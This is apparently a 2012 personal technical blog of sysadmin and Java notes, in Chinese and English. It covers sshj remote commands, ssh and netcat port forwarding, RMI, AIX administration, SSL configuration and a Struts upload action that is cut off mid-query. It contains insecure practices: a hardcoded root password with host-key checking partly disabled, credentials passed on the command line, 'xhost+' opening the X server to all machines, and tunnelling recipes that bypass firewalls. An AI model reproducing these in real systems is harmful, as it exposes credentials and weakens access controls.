  $("#result").sortingTable({
    formName: 'form1',
    sortBy: '${sortBy}',
    order: '${order}',
    excludeSortColumns: [1],
    mergeColumns: [1, 2, 3, 10]
  });
});
</script>
<table id="result" border="1">
  <thead>
  <tr>
    <th id="xx.a">Chapter</th>
    <th id="xx.b">Section/Regulation</th>
  </tr>
  </thead>
  ...
</table>

2012-07-10

2012-07-10

Call command through sshj

create a maven project `mvn archetype:generate`

copy sshj’s dependency to pom.xml

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>dh</groupId>
  <artifactId>ssh-remote</artifactId>
  <version>1.0-SNAPSHOT</version>
  <packaging>jar</packaging>

  <name>ssh-remote</name>
  <url>http://maven.apache.org</url>

  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>

  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>

    <dependency>
        <groupId>net.schmizz</groupId>
        <artifactId>sshj</artifactId>
        <version>0.8.0</version>
    </dependency>

    <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-api</artifactId>
        <version>1.6.1</version>
    </dependency>
    <dependency>
        <groupId>ch.qos.logback</groupId>
        <artifactId>logback-core</artifactId>
        <version>0.9.29</version>
    </dependency>
    <dependency>
        <groupId>ch.qos.logback</groupId>
        <artifactId>logback-classic</artifactId>
        <version>0.9.29</version>
    </dependency>
  </dependencies>

<build>
 <plugins>
  <plugin>
   <groupId>org.codehaus.mojo</groupId>
   <artifactId>exec-maven-plugin</artifactId>
   <version>1.1.1</version>
   <executions>
    <execution>
     <phase>test</phase>
     <goals>
      <goal>java</goal>
     </goals>
     <configuration>
      <mainClass>dh.App</mainClass>
      <arguments>
       <argument>arg0</argument>
       <argument>arg1</argument>
      </arguments>
     </configuration>
    </execution>
   </executions>
  </plugin>
 </plugins>
</build>
</project>

create logback.xml

<configuration>

  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <!-- encoders are assigned the type
         ch.qos.logback.classic.encoder.PatternLayoutEncoder by default -->
    <encoder>
      <pattern>%d{HH:mm} [%thread] %-5level %logger{36} - %msg%n</pattern>
    </encoder>
  </appender>

  <!-- appender name="STDOUT"
			class="ch.qos.logback.core.ConsoleAppender">
		<layout class="ch.qos.logback.classic.PatternLayout">
			<pattern>%-4relative [%thread] %-5level %class - %msg%n</pattern>
		</layout>
	</appender -->

  <root level="off">
    <appender-ref ref="STDOUT" />
  </root>
</configuration>

coding App.java

package dh;

import java.io.IOException;
import java.util.concurrent.TimeUnit;

import net.schmizz.sshj.SSHClient;
import net.schmizz.sshj.common.IOUtils;
import net.schmizz.sshj.connection.channel.direct.Session;
import net.schmizz.sshj.connection.channel.direct.Session.Command;

public class App {
  private static final String df_command = "df -g|head -3|tail -2";
  private static final String recon_command = "/tmp/xx/pps-recon.sh";
  private static final String user = "root";
  private static final String passwd = "pass3822";
  private static final String wap01fingerprint = "5a:34:f2:12:5f:2b:6c:8a:7d:8e:f0:1b:ca:1a:cb:f7";
  private static final String wap02fingerprint = "2a:97:e4:7b:50:e2:8a:5c:38:ae:d4:bf:fa:8c:ee:01";

  public void diskCheck() throws IOException {
    run("10.13.135.71", wap01fingerprint, df_command);
    run("10.13.135.72", wap02fingerprint, df_command);
  }

  private void restartRecon() throws IOException {
    run("10.13.135.71", wap01fingerprint, recon_command);
    run("10.13.135.72", wap02fingerprint, recon_command);
  }

  private void run(String host, String fingerprint, String command)
      throws IOException {
    final SSHClient ssh = new SSHClient();
    //ssh.loadKnownHosts();

    try {
      ssh.addHostKeyVerifier(fingerprint);

      ssh.connect(host);
      ssh.authPassword(user, passwd);
      final Session session = ssh.startSession();
      try {
        final Command cmd = session.exec(command);
        System.out.println("<<" + host + ">> -- " + IOUtils.readFully(cmd.getInputStream())
            .toString());
        cmd.join(5, TimeUnit.SECONDS);
        //System.out.println("\n** exit status: " + cmd.getExitStatus());
      } finally {
        session.close();
      }
    } finally {
      ssh.disconnect();
    }
  }

  public static void main(String... args) throws IOException {
    App app = new App();
    app.diskCheck();
    app.restartRecon();
  }
}

run: `mvn compile package`

file structure as below:

src
├─main
│  ├─java
│  │  └─dh
│  │          App.java
│  │
│  └─resources
│          logback.xml
│
└─test
    └─java
        └─dh
                AppTest.java

run program in command line run.bat

@echo off
java -cp target/ssh-remote-1.0-SNAPSHOT.jar;C:/Users/HPUser/.m2/repository/ch/qos/logback/logback-core/0.9.29/logback-core-0.9.29.jar;C:/Users/HPUser/.m2/repository/ch/qos/logback/logback-classic/0.9.29/logback-classic-0.9.29.jar;C:/Users/HPUser/.m2/repository/net/schmizz/sshj/0.8.0/sshj-0.8.0.jar;C:/Users/HPUser/.m2/repository/org/slf4j/slf4j-api/1.6.1/slf4j-api-1.6.1.jar dh.App
rem mvn exec:java -Dexec.mainClass="dh.App"
rem mvn exec:java -Dexec.mainClass="dh.App" -Dexec.classpathScope=runtime

2012-06-25

2012-06-25

IP/Port forwarding

*nix

rinetd (http://www.boutell.com/rinetd/)

netcat ( http://netcat.sourceforge.net/)

1 2	mkfifo backpipe nc -l 12345 0<backpipe \| nc www.google.com 80 1>backpipe

socat (http://www.dest-unreach.org/socat/)

iptables (http://www.netfilter.org/downloads.html)

ssh

ssh user@10.13.135.47 -L 7001:10.13.135.54:9081 -g
端口7001在当前运行这个命令的机器上打开
ssh user@10.13.135.47 -R 7001:10.13.135.54:9081 -g
端口7001在10.13.135.47机器上打开

A跟B是同一个网络，B跟C是一个网络，C跟D同一个网络，但A不能到达D。

B机上运行
ssh root@C_host -L 7001:D_host:9081 -g

B机上运行
netstat -an|grep 7001
会看到0.0.0.0的端口7001在监听（如果没有-g，会显示127.0.0.1:7001在监听）

这样A可以通过B的7001端口发送数据可以到达D的9081端口，其中B到C的数据链路是被加密了的，而A->B和C->D是没有的。

反向代理
如果A可以到B，但由于防火墙导致B不能到A，那么就可以使用ssh -R，让端口开在B。例如A是proxy，希望让B可以访问internet，可以使用如下方法：
在A上运行：ssh -R 7001:localhost:8080 B
再在B上运行：export http_proxy=http://localhost:7001

题外话：
如果在C上配置nginx/squid了，这样可以使用C为proxy。
A->B(7001)->C(9081)->C(80/443)

java

mina (http://mina.apache.org)
netty (http://netty.io)
openportmapper (http://openportmapper.sf.net)

window

netcat (http://joncraton.org/blog/46/netcat-for-windows)
ncat (http://nmap.org)
3proxy (http://3proxy.ru/)

Ref:

http://en.wikipedia.org/wiki/Netcat
http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
http://fsfoundry.org/codefreak/2006/05/18/ssh-port-forwarding-basics/
https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/
http://blog.moonforest.org/2011/02/use-sshtunnel-and-nginx-as-proxy-on-android/
http://madeye.me/2011/02/10/ssh-tunnel-on-the-android-application-puff-android-edition

2012-06-21

2012-06-21

RMI学习

package rmi;

import java.rmi.Remote;
import java.rmi.RemoteException;

public interface MyService extends Remote {
  void sayHi(String name) throws RemoteException;
}

package rmi;

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

public class MyServiceImpl extends UnicastRemoteObject implements MyService {

  private static final long serialVersionUID = -8550790423811608199L;

  protected MyServiceImpl() throws RemoteException {
    super();
  }

  public void sayHi(String name) {
    System.out.println("hello " + name);
  }

}

package rmi;

import java.net.MalformedURLException;
import java.rmi.Naming;
import java.rmi.RMISecurityManager;
import java.rmi.RemoteException;

public class RmiServer {
  public static void main(String[] args) {
    if (System.getSecurityManager() == null) {
      System.setSecurityManager(new RMISecurityManager());
    }

    // String server = "0.0.0.0";
    String server = "10.13.139.98";
    String rmiPort = "2012";
    System.out.println("starting server " + server);
    try {
      Naming.rebind("rmi://" + server + ":" + rmiPort + "/MyService",
          new MyServiceImpl());
    } catch (RemoteException e) {
      // TODO Auto-generated catch block
      e.printStackTrace();
    } catch (MalformedURLException e) {
      // TODO Auto-generated catch block
      e.printStackTrace();
    }
  }
}

package rmi;

import java.net.MalformedURLException;
import java.rmi.Naming;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;

public class Client {
  public static void morning() {
    String server = "10.13.139.100";
    String rmiPort = "2012";
    try {
      MyService myService = (MyService) Naming.lookup("rmi://" + server
          + ":" + rmiPort + "/MyService");
      System.out.println("myService = " + myService);
      myService.sayHi("Forest, Good morning!");
    } catch (MalformedURLException e) {
      e.printStackTrace();
    } catch (RemoteException e) {
      e.printStackTrace();
    } catch (NotBoundException e) {
      e.printStackTrace();
    }
  }

  public static void main(String[] args) {
    morning();
  }
}

my.policy

codeBase "file:///C:/workspace/rmi/bin/*"{

1 2	permission java.net.SocketPermission "0.0.0.0:2012", "connect,resolve"; };

Run commands,

C:\j2sdk1.4.2_10\bin\rmic.exe rmi.MyServiceImpl

rmiregistry.exe 2012

java.exe -Djava.rmi.server.hostname=10.13.139.98 -Djava.rmi.server.codebase=file:///C:/workspace/rmi/bin/ -Djava.security.policy=my.policy -cp . rmi.RmiServer

java.exe -cp . rmi.Client

注意：

如果机器上有多个IP，可以使用java.rmi.server.hostname指定其中一个，如果打印lookup后的对象，会看到MyServiceImpl_Stub[RemoteStub [ref: [endpoint:10.13.139.98:1085,objID:[f72617:1380931e011:-8000, 0]]]]
java.rmi.server.codebase=file:///C:/workspace/rmi/bin/，windows下file后要有3个/，和最后要有个/
my.policy中的*，代表该目录下的所有全限定类拥有权限，是classpath的路径，而不是在.class的目录

Reference

http://docs.oracle.com/javase/1.4.2/docs/guide/rmi/getstart.doc.html

2012-06-20

2012-06-20

AIX Lib path setting & AIX 5.x library url

Download wget from http://computer-refuge.org/classiccmp/aixpdslib/

Run command

uncompress wget.1.10.2.tar.Z
tar xvf wget.1.10.2.tar

crontab -l
20 13,19 * * 1-5 /usr/local/bin/wget -q --no-cache -O /dev/null http://aa.bb.com

then set library path as below,

1 2	export LD_LIBRARY_PATH=/tmp/xx/tools/usr/local/lib export LIBPATH=$LD_LIBRARY_PATH

Reference
http://computer-refuge.org/classiccmp/aixpdslib/
http://www.perzl.org/aix/index.php?n=Main.HomePage
http://gnome.bullfreeware.com/aixtoolbox/RPMS/ppc/
http://www.bullfreeware.com/
http://bio.gsi.de/DOCS/AIX/aixpdslib.seas.ucla.edu/

2012-06-12

2012-06-12

Crystal Clear出现X connection to :0.0 broken (exp...

Crystal Clear遇到个问题，在AIX的native_stderr.log看到X connection to :0.0 broken (explicit kill or server shutdown).
运行xhost，hold住了，没有反应。

折腾了一天，解决方法很简单，将DISPLAY由:0.0改为:100.0，虽然有些古怪，but it works.

这个问题让自己了解到更多X Server的内容。

要启动AIX上的X Server

/usr/dt/bin/dtlogin -daemon

然后产生如下进程：

1 2	/usr/lpp/X11/bin/X -x abx -x dbe -x GLX -D /usr/lib/X11//rgb -T -force :0 -auth /var/dt/A:0-vcgtMa /usr/bin/X11/X -force -vfb -x abx -x dbe -x GLX :100

如果DISPLAY=:100.0 用 netstat -an|grep 100 会看到6100端口开启了，等待连接。

以下是一些摘录的内容：

The X server can be disabled and then killed with the following

commands:

1 2	/usr/dt/bin/dtconfig -d /usr/dt/bin/dtconfig -kill

The X server can be restored after applying the fix with the following commands:

1 2	/usr/dt/bin/dtconfig -e /usr/bin/startsrc -s dtsrc

Others

Open a terminal emulator window, and log in as root.
Obtain the process ID of the Login Manager by typing the following:
cat /var/dt/Xpid
Stop the Login Manager by typing:
kill -term process_id

Starting the Common Desktop Environment manually. Use this procedure to start the Common Desktop Environment manually.

Log in to your system as root.
At the command line, type the following:
/usr/dt/bin/dtlogin -daemon
tail /var/dt/Xerrors

参考：

https://groups.google.com/group/comp.unix.aix/browse_thread/thread/9ccd826368903176?pli=1
http://blog.csdn.net/huang_tg/article/details/6120409

2012-06-06

2012-06-06

Samba & add route in AIX

Samba

1
2
3

smbclient -L 10.13.135.99 -U ITDEV%ITDEV -D /itshare
smbclient //10.13.135.99/itshare -U ITDEV%ITDEV
smbclient //10.13.135.99/itshare -U ITDEV%ITDEV -c "ls"

Two network cards in server, so add route to let my local machine can be accessible in server

ifconfig -a
en0:10.13.135.31
en1:10.13.135.81

route add 10.13.136.237 10.13.135.65 -if en1
route delete 10.13.136.237 10.13.135.65
ping 10.13.136.237
traceroute -r -s 10.13.135.81 10.13.136.237
netstat -r traceroute 10.13.136.237

删除不用的默认gateway
route delete default 10.13.135.1

2012-06-01

2012-06-01

Crystal Clear出现Could not initialize class sun.awt.X11GraphicsEnvironment

系统使用Websphere 5，相应的jdk是1.3，所以无法使用headless模式-Djava.awt.headless=true解决这个问题。

在jdk1.3下的有几个比较重要的步骤：

出现java.lang.NoClassDefFoundError: sun/awt/X11GraphicsEnvironment

用export DISPLAY=:100

1
2
3

<machine name>:<server number>.<screen number>
<machine name>默认是localhost
<screen number>>默认是0

如果上述步骤后出现Can’t connect to X11 window server using ‘:100’ as the value of the DISPLAY variable.
用xhost+local machine name
当然最简单是xhost+，这样可以让所有机器访问这台服务器
之前遇到的问题使用上述两个步骤就可以解决了，但有个前提是已经安装了Xvfb(Virtual X11 Frame Buffer)，使用命令
ps -ef|grep X

AIX显示结果如下：

1
2

root   3420   5236   0   Jan 03      -  5:02 /usr/lpp/X11/bin/X -x abx -x dbe -x GLX -D /usr/lib/X11//rgb -T -force :0 -auth /var/dt/A:0-SVfhqa
root  25812      1 120   Jan 03      - 32714:55 /usr/bin/X11/X -force -vfb -x abx -x dbe -x GLX :100

参考：

http://www.websina.com/bugzero/faq/exception-x11.html
http://download.oracle.com/otn_hosted_doc/jdeveloper/904preview/uixhelp/uixdevguide/xserver.html

2012-05-31

2012-05-31

在AIX上安装ssh

由于没有办法在AIX 5.2上使用smitty install_all openssh，因为安装完后调用ssh命令出现error，只有在一台当年已经安装了ssh的机器上copy过来，另外由于不想再/usr/local上安装这个ssh，在/tmp上安装这个ssh了。

使用nfs搭桥到装有ssh的机器。

Copy files

1
2
3

copy -rp /usr/local/sbin/sshd /tmp/xx/ssh/sbin
copy -rp /usr/local/bin  /tmp/xx/ssh/
copy -rp /usr/local/etc  /tmp/xx/ssh/

创建子系统

1
2

mkssys -s sshd -p /tmp/xx/ssh/sbin/sshd -a "-D -f /tmp/xx/ssh/etc/sshd_config" -u 0 -e /dev/console -i /dev/console -o /dev/console -R -Q -S -f 9 -n 15 -E 20 -G ssh -d -w 20
lssrc -S -s sshd (check it exists)

如果有什么改动，可以
chssys -s sshd -a "-D -f /tmp/xx/ssh/etc/sshd_config"

由于系统没有sshd用户，所以启动时候有些错误，可以增加sshd用户，或者在sshd_config中将
UsePrivilegeSeparation no

和修改key的路径

1
2
3

HostKey /tmp/xx/ssh/etc/ssh_host_rsa_key
HostKey /tmp/xx/ssh/etc/ssh_host_dsa_key
HostKey /tmp/xx/ssh/etc/ssh_host_ecdsa_key

启动sshd，startsrc -g ssh

参考

http://www.ibm.com/developerworks/forums/thread.jspa?threadID=249556
http://daning.iteye.com/blog/166186
http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/sshd-daemon-does-not-start-during-boot-1524597
http://unix.ittoolbox.com/groups/technical-functional/ibm-aix-l/how-to-restart-ssh-in-aix-1551784
http://www.unixguide.net/sun/ssh_installation.shtml

2012-05-29

2012-05-29

aix memory tuning

真实内存数量

lsattr -El sys0 -a realmem（以KB为单位） 
bootinfo -r（以KB为单位） 

prtconf -m（以MB为单位） 
bootinfo -y ->cpu 
bootinfo -K ->kernel 

svmon -G 第一行memory size（需要X4KB) 
vmstat -v/-s 第一行memory page（需要X4KB) 
topas 

lsps -a/-s 
vmo -L/-a 
 
prtconf -v/lscfg 
lsdev -Cc tape/processor/adapter/disk
prtconf = lsconf

ps -efa 显示进程 
ps aux 显示进程内存情况

file pages, minperm, maxperm, numperm关于文件页面占用内存，跟non-computational内存有关(topas)

client pages,maxclient,numclient关于nfs被client连接使用内存有关

数据库服务器由于是计算密集型，所以minperm, maxperm percentage可以设置小一些，而文件服务器可以设置大一些的。

2012-05-23

2012-05-23

https的一些配置

Misc

tunein
sky.fm
browser import cert
ssl in archlinux
ssl in tomcat

Openssl

openssl test https
openssl s_client -showcerts -connect 10.13.139.102:443 -state -debug
openssl s_client -connect 10.13.139.102:465

OpenSSL Command-Line HOWTO
http://www.madboa.com/geek/openssl/(中文版http://www.linuxfly.org/post/185/1/4/)

Tomcat

keytool -genkey -alias developerstation -keyalg RSA -keystore developerstation.keystore -keysize 2048

<Connector port="8443" protocol="HTTP/1.1" SSLEnabled="true"
               maxThreads="150" scheme="https" secure="true"
               clientAuth="false" sslProtocol="TLS" keystoreFile="C:\Software\Tomcat\conf\developerstation.keystore" keystorePass="password"/>

tomcat7中配置ssl的详细步骤(双向认证)

tomcat7中配置ssl的详细步骤(单向认证)

IHS

例子

Listen 10.13.139.102:443
<VirtualHost 10.13.139.102:443>
   SSLEnable
   SSLClientAuth none
   Keyfile C:\temp\ssl\key.kdb
   SSLV2Timeout 100
   SSLV3Timeout 1000
</VirtualHost>
SSLDisable

Reference:

Guide to properly setting up SSL within the IBM HTTP Server
在IHS上配置SSL
Configuring the IBM HTTP Server for SSL
SSL Directives
Debugging SSL communications

IKEYMAN生成证书

例子

"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -keydb -create -db xx.kdb -pw password -type cms -expire 60 -stash
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -create -db xx.kdb -pw password -size 1024 -dn "CN=weblinux.raleigh.ibm.com,O=IBM,OU=IBM HTTP Server,L=RTP,ST=NC,C=US" -label mylabel -default_cert yes
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -list -db xx.kdb -pw password
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -details -db xx.kdb -pw password -label mylabel
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -extract -db xx.kdb -pw password -label mylabel -format ascii -target forest-certficate
"C:\Program Files\IBM\gsk5\bin\gsk5cmd.exe" -cert -export -db xx.kdb -pw password -label mylabel -target forest.p12 -target_pw password -target_type pkcs12 -encryption strong

Using iKeyman to create a key database file
Using the Key Management Utility
httpservers doc
ikeycmd参考

2012-05-11

2012-05-11

在AIX上空闲卷上重建文件系统

在卷组vg01上重建具有5个物理分区的逻辑卷，卷名为mytest，类型jfs2（一个物理分区大小为128或512M，具体用命令lsvg vg01查看PP Size）

mklv -y mytest -t jfs2 vg01 5

在逻辑卷mytest上重建可读写的jfs2文件系统，并新建挂载文件夹/mounttest

crfs -v jfs2 -d mytest -p rw -m /mounttest

查看逻辑卷：

lslv mytest
lsvg -l vg01

查看/etc/filesystems文件，看到

/mounttest:
  dev             = /dev/mytest
  vfs             = jfs2
  log             = /dev/loglv04
  mount           = false
  options         = rw
  account         = false

此时mytest的LV STATE为closed/syncd，直到将其挂载到/mounttest才能使用。

mount /dev/mytest /mounttest

用lsvg -l vg01看LV STATE转为open/syncd

查看文件系统：df -g，看到/mounttest已挂载。

卸载文件系统:

1
2
3

umount /mounttest (LV STATE转为closed/syncd)
rmfs /mounttest
rmlv loglv04

有以下这些概念需要注意：

vg_name
pv_name
lv_name
mountpoint
vg01
hdisk0
mytest
mountest

找出一个物理卷可用到空间：lspv -p hdisk1，找到state显示free的部分。

了解以下命令有帮助：

lscfg
prtconf
lsdev -Cc hdisk
lsattr -El hdisk0
lsvg
lspv
lslv
lsfs

Reference:

http://study.chyangwa.com/IT/AIX/aixcmds1/crfs.htm
http://www.tek-tips.com/faqs.cfm?fid=3180
http://www.ibm.com/developerworks/aix/library/au-dutta_cmds.html
http://www.cnblogs.com/Mainz/articles/1027105.html
http://blog.csdn.net/tglg/article/details/4557948

2012-04-19

2012-04-19

Sorting & Cell Merge, commons-upload

LegalAdviceAction.java

import vo.CaseLegalAdvice;
import vo.Chapter;
import vo.Enactment;
import vo.EnactmentView;
import vo.LegalAdviceUpload;
import vo.OffenseQuote;

import java.io.File;
import java.io.FileInputStream;
import java.io.Serializable;
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.Statement;
import java.sql.Timestamp;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Locale;
import java.util.ResourceBundle;
import java.util.StringTokenizer;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.apache.commons.fileupload.DiskFileUpload;
import org.apache.commons.fileupload.FileItem;
import org.apache.oro.text.regex.MatchResult;
import org.apache.oro.text.regex.Pattern;
import org.apache.oro.text.regex.PatternCompiler;
import org.apache.oro.text.regex.PatternMatcher;
import org.apache.oro.text.regex.Perl5Compiler;
import org.apache.oro.text.regex.Perl5Matcher;
import org.apache.struts.action.ActionForm;
import org.apache.struts.action.ActionForward;
import org.apache.struts.action.ActionMapping;
import org.apache.struts.actions.DispatchAction;

import xx.utils.DbManager;

public class LegalAdviceAction extends DispatchAction {
  final ResourceBundle uploadSetting = ResourceBundle
      .getBundle("xx.properties.uploadSettings");

  public ActionForward save(ActionMapping mapping, ActionForm form,
      HttpServletRequest request, HttpServletResponse response)
      throws Exception {

    final SimpleDateFormat sf = new SimpleDateFormat("dd/MM/yyyy",
        Locale.ENGLISH);

    final String savePath = uploadSetting
        .getString("upload.dir.prosecutions");

    String fileNo = "";
    String subject = "";
    String legalAdviceStatus = "";
    String legalAdviceRemarks = "";
    String legalAdviceDate = "";
    String authRefInd = "";
    String authRef = "";
    String defendant = "";
    String defendantEmployer = "";
    String defendantEmployee = "";
    String ordinance = "";
    String keepFileNos = "";
    List fileContent = new ArrayList();

    List keepFileNosList = new ArrayList();
    List uploadFileList = new ArrayList();
    String reqCode = "";
    String caseNo = "";

    final Timestamp now = new Timestamp(new java.util.Date().getTime());
    String login_id = (String) request.getSession()
        .getAttribute("login_id");

    final DiskFileUpload upload = new DiskFileUpload();
    final List list = upload.parseRequest(request);
    final Iterator it = list.iterator();
    while (it.hasNext()) {
      final FileItem item = (FileItem) it.next();
      if (item.isFormField()) {
        if (getParamter(item, "subject")) {
          subject = item.getString();
        } else if (getParamter(item, "ordinance")) {
          ordinance = item.getString();
        } else if (getParamter(item, "legalAdviceDate")) {
          legalAdviceDate = item.getString();
        } else if (getParamter(item, "legalAdviceStatus")) {
          if ("a".equals(item.getString())) {
            legalAdviceStatus = "Accepted";
          } else if ("na".equals(item.getString())) {
            legalAdviceStatus = "Not Accepted";
          } else {
            legalAdviceStatus = "Not Mentioned";
          }
        } else if (getParamter(item, "legalAdviceRemarks")) {
          legalAdviceRemarks = item.getString();
        } else if (getParamter(item, "authRefInd")) {
          authRefInd = item.getString();
        } else if (getParamter(item, "defendantEmployer")) {
          defendantEmployer = item.getString();
        } else if (getParamter(item, "defendantEmployee")) {
          defendantEmployee = item.getString();
        } else if (getParamter(item, "fileNo")) {
          fileNo = item.getString();
        } else if (getParamter(item, "authRef")) {
          authRef = item.getString();
        } else if (getParamter(item, "reqCode")) {
          reqCode = item.getString();
        } else if (getParamter(item, "caseNo")) {
          caseNo = item.getString();
        } else if (getParamter(item, "keepFileNos")) {
          keepFileNos = item.getString();
        }
      } else {
        String fileName = item.getName();
        if (fileName != null && fileName.length() > 0) {
          if (fileName.indexOf("\\") != -1) {
            PatternCompiler compiler = new Perl5Compiler();
            PatternMatcher matcher = new Perl5Matcher();
            Pattern pattern = compiler.compile("^.+\\\\(.+)$");
            if (matcher.matches(fileName, pattern)) {
              MatchResult ms = matcher.getMatch();
              System.out
                  .println("fileName full path " + fileName);
              fileName = ms.group(1);
              System.out.println("fileName " + fileName);
            }
          }

          uploadFileList.add(fileName);
          fileContent.add(item);
        }
      }
    }

    if (defendantEmployer.length() > 0 && defendantEmployee.length() > 0) {
      defendant = defendantEmployer + "/" + defendantEmployee;
    } else if (defendantEmployer.length() > 0) {
      defendant = defendantEmployer;
    } else {
      defendant = defendantEmployee;
    }

    System.out.println("caseNo " + caseNo + " , subject " + subject
        + " ,legalAdviceDate " + legalAdviceDate + " , ordinance "
        + ordinance + " , keepFileNos " + keepFileNos);

    final Connection conn = DbManager.getConnection();

    if ("edit".equals(reqCode)) {
      System.out.println("edit legail advice");
      String sql = "update case_legal_advice set offense_code = ?, file_no = ?, subject = ?, "
          + "legal_advice_date = ?, legal_advice_status = ?, legal_advice_remarks = ?, "
          + "defendant = ?, auth_ref_ind = ?, auth_ref = ?,"
          + "last_update = ?, update_by = ? where case_seq_no = ?";
      PreparedStatement ps = conn.prepareStatement(sql);

      ps.setString(1, ordinance);
      ps.setString(2, fileNo);
      ps.setString(3, subject);
      ps.setDate(4, new Date(sf.parse(legalAdviceDate).getTime()));
      ps.setString(5, legalAdviceStatus);
      ps.setString(6, legalAdviceRemarks);
      ps.setString(7, defendant);
      ps.setString(8, authRefInd);
      ps.setString(9, authRef);

      ps.setTimestamp(10, now);
      ps.setString(11, login_id);
      ps.setInt(12, Integer.parseInt(caseNo));

      ps.executeUpdate();
      ps.close();

      StringTokenizer st = new StringTokenizer(keepFileNos, "|");
      while (st.hasMoreTokens()) {
        String token = st.nextToken();
        System.out.println("keep file No. " + token);
        keepFileNosList.add(token);
      }

      String fileSql = "select upload_seq_no, file_name from legal_advice_upload where case_seq_no = ? order by upload_seq_no";
      System.out.println("fileSql  " + fileSql);
      ps = conn.prepareStatement(fileSql);
      ps.setString(1, caseNo);
      ResultSet rs = ps.executeQuery();

      List toDeleteFilesNo = new ArrayList();
      while (rs.next()) {
        String upload_seq_no = rs.getString("upload_seq_no");
        String file = rs.getString("file_name");

        if (!keepFileNosList.contains(upload_seq_no)) {
          toDeleteFilesNo.add(upload_seq_no);
          if (new File(savePath + file).delete()) {
            System.out.println("file " + file + " is deleted.");
          }
        }
      }
      rs.close();
      ps.close();

      Iterator delItr = toDeleteFilesNo.iterator();
      String deleteFileSql = "delete legal_advice_upload where upload_seq_no = ?";
      ps = conn.prepareStatement(deleteFileSql);
      while (delItr.hasNext()) {
        String uploadNo = (String) delItr.next();
        ps.setString(1, uploadNo);
        ps.executeUpdate();
      }
      ps.close();

    } else {
      System.out.println("add legail advice.");
      int seq = 0;
      Statement stmt = conn.createStatement();
      ResultSet rs = stmt
          .executeQuery("select case_legal_advice_SQ.nextval as seq from dual");

      while (rs.next()) {
        seq = rs.getInt("seq");
      }
      rs.close();
      stmt.close();

      System.out.println("case_legal_advice_SQ " + seq);
      caseNo = String.valueOf(seq);
      String sql = "insert into case_legal_advice(case_seq_no, offense_code, file_no, subject, legal_advice_date, "
          + "legal_advice_status, legal_advice_remarks, defendant, auth_ref_ind, auth_ref, "
          + "last_update, update_by) values(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)";
      final PreparedStatement ps = conn.prepareStatement(sql);

      ps.setInt(1, seq);
      ps.setString(2, ordinance);
      ps.setString(3, fileNo);
      ps.setString(4, subject);
      ps.setDate(5, new Date(sf.parse(legalAdviceDate).getTime()));
      ps.setString(6, legalAdviceStatus);
      ps.setString(7, legalAdviceRemarks);
      ps.setString(8, defendant);
      ps.setString(9, authRefInd);
      ps.setString(10, authRef);

      ps.setTimestamp(11, now);
      ps.setString(12, login_id);

      ps.executeUpdate();
      ps.close();
    }

    Iterator itr = uploadFileList.iterator();
    int i = 0;
    while (itr.hasNext()) {
      String fileName = (String) itr.next();
      int uploadReq = 0;
      Statement stmt2 = conn.createStatement();
      ResultSet rs2 = stmt2
          .executeQuery("select legal_advice_upload_SQ.nextval as seq from dual");

      while (rs2.next()) {
        uploadReq = rs2.getInt("seq");
      }
      rs2.close();
      stmt2.close();
      System.out.println("legal_advice_upload_SQ " + uploadReq);

      String sql2 = "insert into legal_advice_upload (upload_seq_no, case_seq_no, file_name, last_update, update_by) values(?, ?, ?, ?, ?)";
      PreparedStatement ps2 = conn.prepareStatement(sql2);
      ps2.setInt(1, uploadReq);
      ps2.setInt(2, Integer.parseInt(caseNo));
      ps2.setString(3, fileName);
      ps2.setTimestamp(4, now);
      ps2.setString(5, login_id);
      ps2.executeUpdate();
      ps2.close();

      FileItem item = (FileItem) fileContent.get(i);

      System.out.println("save file " + fileName + " => " + savePath
          + String.valueOf(uploadReq));
      item.write(new File(savePath + String.valueOf(uploadReq)));
    }

    return mapping.findForward("redirectList");
  }

  private boolean getParamter(FileItem item, String paramName) {
    if (item.getString() != null && item.getFieldName().equals(paramName)) {
      return true;
    }
    return false;
  }

  public ActionForward list(ActionMapping mapping, ActionForm form,
      HttpServletRequest request, HttpServletResponse response)
      throws Exception {
    String orderBy = request.getParameter("orderBy");
    System.out.println("orderBy " + orderBy);

    Object lastFieldSort = request.getSession().getAttribute(
        "lastFieldSort");
    FieldSort fieldSort = null;

    if (lastFieldSort == null) {
      fieldSort = new FieldSort();
      fieldSort.setSortBy(orderBy);
      fieldSort.setAsc(Boolean.TRUE);
    } else {
      fieldSort = (FieldSort) lastFieldSort;

      if (fieldSort.getSortBy() != null
          && fieldSort.getSortBy().equals(orderBy)) {
        if (fieldSort.getAsc().equals(Boolean.TRUE)) {
          fieldSort.setAsc(Boolean.FALSE);
        } else {
          fieldSort.setAsc(Boolean.TRUE);
        }
      } else {
        fieldSort.setSortBy(orderBy);
        fieldSort.setAsc(Boolean.TRUE);
      }
    }

    final Connection conn = DbManager.getConnection();

    Statement stmt = conn.createStatement();
    String sql = "select e.enact_Chap, e.title, c.chapter, o.sect_reg, o.description, cla.case_seq_no, cla.file_no, cla.subject, "
